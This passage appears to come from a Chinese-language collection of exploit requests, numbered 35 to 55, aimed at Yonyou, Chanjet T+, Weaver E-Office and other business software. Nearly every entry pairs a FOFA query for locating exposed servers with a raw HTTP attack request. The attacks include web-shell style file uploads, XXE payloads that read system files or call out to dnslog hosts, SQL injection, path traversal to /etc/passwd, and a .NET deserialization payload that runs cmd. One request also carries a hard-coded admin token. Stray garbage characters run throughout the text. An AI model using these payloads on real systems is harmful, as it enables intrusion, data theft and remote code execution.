8 K6 t, e8 H1 }% pHost: your-ip6 I" d/ h' X% |# m* B# E8 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! Y: o9 u' Q: G# X% I, X
Content-Type: application/x-www-form-urlencoded, K/ a8 B. c& G9 q' P
Accept-Encoding: gzip, deflate4 r8 }4 ]- s$ ?. x, F
Accept: */*/ `+ j- ?8 _# Z& n9 B+ K% S" Z0 K; D
Connection: keep-alive
. c& r) w1 x0 x2 |/ u% G
) h; T0 P+ o4 G( p( y' j  ~4 q& V# M, Q% S4 f+ G
35. 用友NC-Cloud importhttpscer任意文件上传( K' o: a6 g  h3 V" R
FOFA:app="用友-NC-Cloud"
- j! {2 B( U7 n" J: G" b/ RPOST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1" a2 I6 Q) q& ~* a: m
Host: 203.25.218.166:8888
% |0 x3 z" ^/ s  l" \User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info; d3 @2 Y6 n. e; e
Accept-Encoding: gzip, deflate
8 C! I/ u& d1 W% XAccept: */*- i2 K3 L$ [  c/ Q2 p+ Q
Connection: close
2 \& v: f% P4 r# v7 M1 Y4 ]accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA( Y7 C7 w: B8 w8 ?# u4 q
Content-Length: 190
, U' Z7 f. a. e- P; X$ vContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0
2 B3 @5 q' w8 O
5 e% L4 e5 y8 F3 k--fd28cb44e829ed1c197ec3bc71748df0
& \, H" V: w; i( |4 e4 X* }Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"$ a  h+ n! M( z

; ]& Y+ _. v( p* q4 Y3 u<%out.println(1111*1111);%>
: v" y' k; u& a7 A. d6 V- S( K& ?--fd28cb44e829ed1c197ec3bc71748df0--
3 h, A" W! I+ m! P7 y! `
2 H7 p9 z: `" s
$ q) X$ t" I1 l, q4 g36. 用友NC-Cloud soapFormat XXE
7 E/ b! Z9 V" P- CFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
" ]( {  R0 T& r( m: E* CPOST /uapws/soapFormat.ajax HTTP/1.1
7 d  D& O3 t! t& ~$ y* W) v$ q2 wHost: 192.168.40.130:89897 U3 x+ r# {: e9 T- i* F& x8 ^! V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0( P: i+ C. a$ S2 Q: _" s7 i
Content-Length: 263
* w; L3 z, N9 t5 L2 d3 e) KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" W. ?! M  Z8 }Accept-Encoding: gzip, deflate
$ ~: j% ^  |4 {3 S  `4 IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  p2 |2 a1 b' h, nConnection: close
% h  e& S. ^% x; H7 Y6 Y. ]Content-Type: application/x-www-form-urlencoded
! ~- B" [, \3 x& D3 j9 UUpgrade-Insecure-Requests: 16 g& Y# Q2 @" o/ {& F

, p" ?' o% ?* k2 Y8 m& c7 Imsg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a/ X% h+ K6 D4 g* j% Q% l

8 B; W1 h8 f: q4 F, r8 f  w/ M
9 E& ]5 \. u+ ~; j1 E  ~37. 用友NC-Cloud IUpdateService XXE* C" k. H: ?6 U' m0 |
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"1 Z& |6 B% Y: X7 S) Y# p, F* ^
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
1 w! h3 z& C% f1 ~, uHost: 192.168.40.130:8989
! e; P  X0 \# R4 {2 V6 O$ KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36) `& S! O# a6 O5 V" J1 X, P9 J4 Z
Content-Length: 421
7 D& B' T4 g* J5 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: P4 \% l% J8 H1 PAccept-Encoding: gzip, deflate7 E1 e% c8 \4 J4 j
Accept-Language: zh-CN,zh;q=0.9' k) J6 v2 W6 l! w
Connection: close
8 N2 B' z6 s. E# s; l( MContent-Type: text/xml;charset=UTF-8
; V) O: O# ^1 Q( G; _. fSOAPAction: urn:getResult$ c, e3 j8 `  c: M; Y- D9 M  ~' E
Upgrade-Insecure-Requests: 1
5 ]2 F; T4 w/ z( |" P  F( M/ m1 B; c' S* J  _' @7 T
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
5 F2 j9 F  \! J8 B! K( c) b<soapenv:Header/>
1 x2 K# r9 a* i, H8 R: V<soapenv:Body>
" |8 S. ]  L$ w7 B9 W4 q<iup:getResult>( H2 P8 A/ m; K1 O
<!--type: string-->
+ ^$ }" l( I& G, D  K8 T<iup:string><![CDATA[
9 b0 B  I, T& t9 P1 K- p<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
. h" C9 S' `5 F, T- ~+ N<xxx/>]]></iup:string>% [1 B5 J8 l1 A5 K
</iup:getResult>
) [  c2 }$ ^6 Z4 J! O</soapenv:Body>' ^# |4 M: S! D, U1 T! j0 {% R
</soapenv:Envelope>' h& z1 ~9 J/ J1 L4 G. j
6 E2 p2 u9 p5 `$ n& A0 @
4 f% S4 N# n5 c# D4 ~
" F" _) A* u* q, s/ i, e
38. 用友U8 Cloud smartweb2.RPC.d XXE4 r0 L3 K9 c# D3 e" V
FOFA:app="用友-U8-Cloud"9 T1 L: U; [4 l: j8 p
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
) u% Y0 C/ {* I, q% B: n9 w; ~- X4 |Host: 192.168.40.131:8088
3 C* Y( u1 h5 bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25! h+ C6 Y: T' v; W  r. x! z. Z
Content-Length: 260) o4 q$ A: i; D8 A' @$ O
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b38 Y" E( U3 B+ M7 b! p
Accept-Encoding: gzip, deflate0 B: a2 n! m  k* ?! y
Accept-Language: zh-CN,zh;q=0.9
: ]( z! F3 Y; i; f; HConnection: close
3 W3 n9 g* U+ t" \Content-Type: application/x-www-form-urlencoded
- @6 Y8 {+ G! g  _0 W! j: W7 U6 y4 l+ {
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>" ~7 [% D0 W$ i* x5 j4 @

2 B; m/ J  C) o. E3 q! y: K8 o! H; S" h2 k9 O1 U+ M2 S
39. 用友U8 Cloud RegisterServlet SQL注入
5 ~. m1 q! q2 b" b: O& V. tFOFA:title="u8c"9 O. i& }$ V( t7 x  I7 C: p$ L# H- r& [
POST /servlet/RegisterServlet HTTP/1.1
& j7 ]/ Q% m9 \, [; s6 p# ?Host: 192.168.86.128:8089  U* |1 D; k9 z5 a; K/ u; H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36# s! O- T& i8 L# U$ p2 d& C
Connection: close( C) ?  Z- \8 h1 i, X( j
Content-Length: 85
/ M& G2 o1 D% jAccept: */*
! z6 V/ j* N4 ^. PAccept-Language: en
3 [9 F; G4 c8 o' f. ?# rContent-Type: application/x-www-form-urlencoded  z, L! Y, v; @/ a5 N- i
X-Forwarded-For: 127.0.0.1
+ u2 Z, S! Z* Y( ]" g% nAccept-Encoding: gzip1 t# F3 R9 [# m. T! e9 T( ^
0 L# {( A( F; u! w1 c7 t
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
: j+ f; u5 n' R/ ~+ ~
: A, x  d  W& A
+ \6 l3 B# h9 c0 i$ s7 A/ r$ j! _40. 用友U8-Cloud XChangeServlet XXE
0 _0 [7 F+ [9 r8 WFOFA:app="用友-U8-Cloud"0 P& D# E7 ^5 X: b
POST /service/XChangeServlet HTTP/1.1
! l) K2 \% |- k& r% P7 ]; z; VHost: x.x.x.x
. u" R9 x5 j" j1 w# {- gUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
$ Q! }, `( {$ t3 Y$ \2 oContent-Type: text/xml2 a2 g$ \2 U+ L" c
Connection: close7 o7 s! V- g2 z# Y$ u  j* a5 a
) b4 N$ F1 S- P# z* m5 \- R
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
+ b3 m; [0 u6 i' I
7 @0 K9 C  S- e6 V! n/ j6 s$ K1 t: v" C1 L$ B+ l0 ?& D
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入, \' ^3 G9 @1 c  f2 N3 W* E
FOFA:app="用友-U8-Cloud"1 J! D2 c; y' H3 _5 `9 f( Y
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
# Q5 T5 q' T3 @- u, m0 Q: sHost:
6 t0 _; s, a$ T6 NUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15* _5 R7 P& [; C4 B$ L: U
Content-Type: application/json+ b0 A# f! o7 s/ z1 q  C. R5 L7 S
Accept-Encoding: gzip
! c4 J! C" G1 ]+ SConnection: close, ^* ^% h/ B$ j/ v; c7 F
- V0 t0 N) W" ^  L' e  \# @

+ _1 q3 t- t. T6 {; p8 J4 i42. 用友GRP-U8 SmartUpload01 文件上传+ ]) N+ d4 k/ N. V/ J& [; Z( ^: S7 e
FOFA:app="用友-GRP-U8"8 H3 Z+ @* _# [" x! ?, r# N: p* w
POST /u8qx/SmartUpload01.jsp HTTP/1.1
8 u/ M) R4 B" H4 c( Y3 \& r* xHost: x.x.x.x: ]  j9 K9 G& }+ l
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
; o2 S( S- |( E9 @. e) S' H% xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.368 L2 j7 S8 i$ \
; a! q  O+ n' [: Q- k  y0 Q
PAYLOAD
9 J! @8 P4 A3 c+ b, B5 W9 L; g
) h3 M- ?1 p+ c9 p. C: N; b1 X% e/ Q' `& _
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
' o5 j5 Y$ e% r! }  Q5 _4 h& k5 b$ Y, Y+ E3 c5 |6 Y/ N
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
  r2 S6 K* C9 ?+ y% hFOFA:app="用友-GRP-U8"
$ u- T% ^& C7 M0 oPOST /services/userInfoWeb HTTP/1.1
6 @! a! _5 F" a4 i$ u9 s0 pHost: your-ip
* e4 Y: A) Y! o! V6 I" x+ aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36/ R5 [. e2 l. v6 n+ z5 @
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. p+ i. j7 L5 x# n
Accept-Encoding: gzip, deflate7 J/ Z! f. u' n8 i6 c6 N# C! S
Accept-Language: zh-CN,zh;q=0.9: Q) e% V% i9 n% X1 L6 w! w
Connection: close+ F$ U" \5 Z: n* z9 x
SOAPAction:# i* ^# J9 @" Q
Content-Type: text/xml;charset=UTF-8
# ~0 C9 W- [! F# Y6 m7 B/ w: S; E: Q' l
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
/ y1 L+ X1 `7 n' p* F0 {   <soapenv:Header/>
" y* D. a5 D( s% G   <soapenv:Body>
$ v5 \5 K( I& D: n" G  Z5 B6 \      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
6 j3 o" ?- t* v% |         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
" A7 s/ Q- U3 y" I% X  z; J      </ser:getUserNameById>
; v" Y: H/ S' ^! r, U   </soapenv:Body>3 L* v* ]4 N: m. J
</soapenv:Envelope>
+ s+ v2 w: E' l+ d% I+ o) E7 p
% W4 D4 p0 N' S  x( Q2 g# b+ |$ z; f6 n! g2 K
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
- j0 @3 ^0 d1 C7 HFOFA:app="用友-GRP-U8"+ O4 h% a5 [( W* h. I
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1. G: I* l! [8 n% f6 R
Host: your-ip
6 y5 M( {& c8 `+ ^- zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.360 G  y: O( p8 a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( P; `8 s% G2 l' t$ Z" \. ~
Accept-Encoding: gzip, deflate
" w0 o; J' {/ O3 h" P; v/ pAccept-Language: zh-CN,zh;q=0.9
% P2 s7 H- h. o( Z; DConnection: close4 j8 i5 N; p$ K6 x7 h% o  a
5 G$ K1 b) ^+ V4 m) p* b

7 V! P6 j8 T- z4 P* x: r7 m7 d& @  N45. 用友GRP-U8 ufgovbank XXE( q1 F  B' l) v' e4 `0 l, N
FOFA:app="用友-GRP-U8"
: G- b# m' n* X8 R0 ~POST /ufgovbank HTTP/1.1
6 S) n& g) J. h% ~8 a5 R: uHost: 192.168.40.130:222
. V; |9 i+ |5 s+ W4 V* OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0" m) P/ S& v. \5 R* E* Q$ U
Connection: close" z- i1 T8 o8 E2 d
Content-Length: 161
( c7 y3 e# s* z' Y: @( d% }: ZAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, q2 b: Y( h4 u2 b+ ]7 ^; T1 wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' m) {% T' T, J2 T2 _
Content-Type: application/x-www-form-urlencoded9 W- G" e" a6 A. Q; G% z
Accept-Encoding: gzip; o' |; H$ u" n1 o2 J& x

: I; L) o' z; E3 {+ X: \+ greqData=<?xml version="1.0"?>
! I6 G; H0 E" f9 ]" r  |<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest* o$ z: K( E3 k: M; ~7 \4 M

) F5 H( t/ F: Y: J6 o& X" U. x0 o. P
46. 用友GRP-U8 sqcxIndex.jsp SQL注入( U) d, y% b! j' o% Q' n3 t
FOFA:app="用友-GRP-U8"
0 }. t! T9 g0 zGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.10 D8 D6 H0 n" O
Host: your-ip
' g% O# P2 {( B- qUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
/ g- B5 u  y" M$ M0 Y$ W8 f3 _- D; @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ I) S* ~# a  p# r
Accept-Encoding: gzip, deflate2 v* B: o6 D- {: @
Accept-Language: zh-CN,zh;q=0.9
' j3 V) R% l; `9 @: KConnection: close) a% Z) A2 I$ E- }' I
! O: N% q- v/ S+ @7 o

" n) c/ t9 b+ @& \; @; K+ ~0 |47. 用友GRP A++Cloud 政府财务云 任意文件读取
! v: ?4 M4 r0 s" C- TFOFA:body="/pf/portal/login/css/fonts/style.css"
7 u$ K! U7 F+ rGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
- e. e2 F9 }$ a3 U; I* BHost: x.x.x.x3 A. L" C; x. n% L
Cache-Control: max-age=0
0 J" I6 X; e9 h7 I0 u( Q( ]- J* ^Upgrade-Insecure-Requests: 1
3 O% ^/ P" ]. z% G5 W4 |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, O2 ^0 N% h$ t0 `5 f/ W. Q; w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  b- C: w+ n: C1 R
Accept-Encoding: gzip, deflate, br
% `/ k7 q6 f: i" |/ FAccept-Language: zh-CN,zh;q=0.9
! ?1 G( T0 m( E( i+ [, bIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
4 b- C) V0 N) e$ F5 @+ AConnection: close, k2 R. O1 x2 _: f" @: J9 Z* ]

) t! Z/ R$ O* E7 u0 R+ \! j& r3 A- Q' V0 F. l& K1 ^. L
) x4 k  N* e" w9 B, U: B% v2 o: m
48. 用友U8 CRM swfupload 任意文件上传
6 H- @" X6 Z- U$ a2 ^FOFA:title="用友U8CRM"
) Z+ E4 f* y" }3 m( tPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1- c4 i" M" w5 K2 G" ^
Host: your-ip  D; l: {& m* \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.08 M5 Z1 h  J" r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 [( U% J& x" m( t! ^Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 ~* H5 G  M$ W: P' H  OAccept-Encoding: gzip, deflate& {5 p- F  N4 z
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668557 l, c! @# P8 b+ i6 n* R
------269520967239406871642430066855
" L+ t+ @$ v) n) YContent-Disposition: form-data; name="file"; filename="s.php": m3 v. J8 j& f# p5 x/ |6 v
1231
2 d& p, A5 b  {0 K9 E! j+ Y3 i! \1 pContent-Type: application/octet-stream
1 T  P1 b) e' T$ e: I$ W------269520967239406871642430066855
! U( I* _5 y( t7 p7 _! C7 x) |! ZContent-Disposition: form-data; name="upload"
) ]7 [; l" s- u1 ]+ a* G8 T: h6 b- _% fupload
6 T" U, D: m3 ?) ?7 s& A3 L0 S------269520967239406871642430066855--1 ~& ?7 G% v. Y( p3 U: \$ z$ z
  G, ?; r% y; [  b8 k" H) T5 Y

) y9 ]/ y9 U% B7 G; k3 I! u49. 用友U8 CRM系统uploadfile.php接口任意文件上传; T( m. G# u2 e2 \" P
FOFA:body="用友U8CRM"
5 j8 [( ?/ g+ z- H! u% h2 c) G3 q4 {1 J8 j) U: h
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
' I5 ]& q3 h/ C' `5 x2 l) XHost: x.x.x.x9 R8 e; v0 W* F5 q3 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
7 ~) f# S* ]7 IContent-Length: 329
2 i1 u! p; w" w- ?& x. cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" w4 O# {+ O; u. S3 I
Accept-Encoding: gzip, deflate
0 A8 I5 c" D# [9 I1 W8 @1 r9 _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 b! O- J2 a2 B0 W' ^Connection: close
1 |" U3 L8 ^' i" N5 |2 UContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w$ y. B6 s: q# m7 ^5 q" g1 U* z

0 J2 V- x7 o# p-----------------------------vvv3wdayqv3yppdxvn3w* F" x6 B' L8 k  K3 ?% P8 I
Content-Disposition: form-data; name="file"; filename="%s.php "8 x4 ]4 {" t! n
Content-Type: application/octet-stream
7 C6 C. h; X/ _& q# ~
0 c% j, a) Y! D( e! Mwersqqmlumloqa* l0 Z, ?4 |$ @' }9 ~
-----------------------------vvv3wdayqv3yppdxvn3w
$ P/ i& J  \$ S2 k* [3 I2 BContent-Disposition: form-data; name="upload"
- E0 v8 S+ {% Q: u( P- w
8 m; Q+ O/ l$ |! @5 `% [: h/ }1 wupload2 O4 X5 F0 `2 u+ j. p# `$ F
-----------------------------vvv3wdayqv3yppdxvn3w--; t8 }3 @6 M8 }' v  w8 g  K+ i
0 M4 T/ z9 u2 e  |

9 S; j( O* o  L9 @http://x.x.x.x/tmpfile/updB3CB.tmp.php/ G# ?1 r/ r& k! a1 G3 e2 [
6 @' f8 o5 `, r7 H
50. QDocs Smart School 6.4.1 filterRecords SQL注入
9 O  e9 {+ U% E1 H3 J6 BFOFA:body="close closebtnmodal"
$ a: d1 W# U1 q$ v0 N) L+ [  c) QPOST /course/filterRecords/ HTTP/1.1
  E* e0 P4 C1 @0 W! {6 C3 h5 R5 sHost: x.x.x.x# |6 Q) f) l# F2 E4 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36  g/ V) w) c, V; B
Connection: close; F; A8 t& f; `
Content-Length: 224
8 e. ~5 C8 o5 ~/ `5 p8 X. N2 R, TAccept: */*" h* ~5 v4 U1 N6 x) B. G5 ^
Accept-Language: en6 {' s* J$ i: i4 E; p
Content-Type: application/x-www-form-urlencoded6 p) [  h' V  Q: z+ P# {- t
Accept-Encoding: gzip
8 F/ D2 W, Z& z( ?/ ^4 i+ N. r5 M! r/ z& O% v7 H' x$ z
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=14 x" ?% H( T( Q* g1 ~/ n  F" z3 x+ {

1 c% t9 t+ Y- O/ N2 o3 S4 v, D4 ]5 k( Q1 ?4 M
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
2 x7 ]7 N7 ^! ~5 Q5 z4 d& cFOFA:app="云时空社会化商业ERP系统"
) p! Q+ P5 Q1 f5 K( oGET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.15 k; Y6 \3 i0 y! U  `" G3 U" F
Host: your-ip) p, x/ o/ C: O1 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36; z# k4 Y! \) X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
' E4 Y  ^, Y# z' {3 U' Y  R8 K4 yAccept-Encoding: gzip, deflate% F3 C# O2 P% D
Accept-Language: zh-CN,zh;q=0.9
2 X' W! {: `+ _+ G- @4 \# ^( ZConnection: close7 r# e* Y- X+ H; i% S

! Q8 T0 h0 y+ ~% a& i/ |+ B1 P& @% z2 _. V) V- O
52. 泛微E-Office json_common.php sql注入
! S+ m  i. q: d4 h2 w# W( y0 W$ m% tFOFA:app="泛微-EOffice"
3 P, `1 P1 i5 V' {' APOST /building/json_common.php HTTP/1.1
. d% ^) R! z4 hHost: 192.168.86.128:8097+ k; V: j5 W' j1 @7 t% b2 Y
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36  U/ G. t0 W$ H* a, ~, p
Connection: close
6 f* R8 z( N& {- J1 v' MContent-Length: 87* x% z3 n* g' y9 U
Accept: */*
6 _3 e6 y3 `) Y6 `Accept-Language: en8 D" B: g* i& |8 b7 `1 n# t
Content-Type: application/x-www-form-urlencoded
  f/ d1 k  L7 a  N- _1 c* G/ H' xAccept-Encoding: gzip
+ r! D  K/ C5 }7 D. l" A
, Q/ e! G1 j. J' o! D+ v. z, A3 htfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3336 k% M! ~! F4 i: O( F) j
- v" i5 Z9 t- Z- b: w1 h

) ]0 I2 {% P/ O53. 迪普 DPTech VPN Service 任意文件上传
7 m6 T6 y9 S& A$ O* {FOFA:app="DPtech-SSLVPN"9 f3 o: b5 {; G8 a; |$ s
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
( p" R7 R% N! {6 t3 G0 E2 o) |- `( e5 v; l. v! O0 J; ?
' Q1 e2 t3 ]& A7 v- P% C) l; }8 R! K
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
' ]( @. u. R, NFOFA:app="畅捷通-TPlus"
8 k" @7 Z2 g5 ?/ @2 Q/ r第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
( o9 E# E. ]' L7 z"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% t& b! W, O2 h+ U' h
% z/ K! z& j! p

' y' D" Y5 E  o8 Q9 Z8 ~6 O完整数据包3 e, A5 d0 C% v, b7 u
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1' S- ~$ W* U5 t6 N4 I8 D
Host: x.x.x.x5 b! a/ n" p( B8 s
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
7 o  h8 [7 [- H' nContent-Length: 593! o, d9 W, k3 e. M6 q5 x# `$ f
. f% |1 M( d7 G6 F+ p5 |# s
{! C4 [& ~9 e9 y, m' B, x  x
"storeID":{4 p( }! A0 L8 Z: j
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
1 [3 ~) S- c" C+ b "MethodName":"Start",, J8 A; ~7 M" N8 i$ a( H4 ]# l- U
  "ObjectInstance":{
* K( `  g3 L6 q8 r! @! y   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
$ f) _9 ~3 a; y, p9 T7 E( E    "StartInfo":{
# H3 k* r' J2 C5 U2 I2 @& p   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",7 G/ ]: U0 I: |( _9 l, l$ \* o
    "FileName":"cmd",, D4 C0 a' X: `* G" X' @: U$ r
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
1 x, ?3 y# {! e: P& }% V4 m7 z$ j    }
5 e/ l2 N9 Q( n) x  }4 L; @: O" @$ b8 Q
  }
2 S4 a9 e5 x+ G5 v}( ~5 {5 S$ p6 i- e) J- _: L0 K
* m* W3 m0 V7 B$ m6 S

/ I  o9 j/ y% n. f4 R第二步,访问如下url
4 r7 c: m1 f! b' m; p/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
9 v2 S% M0 U7 r2 T6 K; `6 _" _/ X) i9 [5 z! n- C# f* ]

/ }! G! O4 W5 i8 B* g# `55. 畅捷通T+ getdecallusers信息泄露5 ?: j! a5 a3 d( `
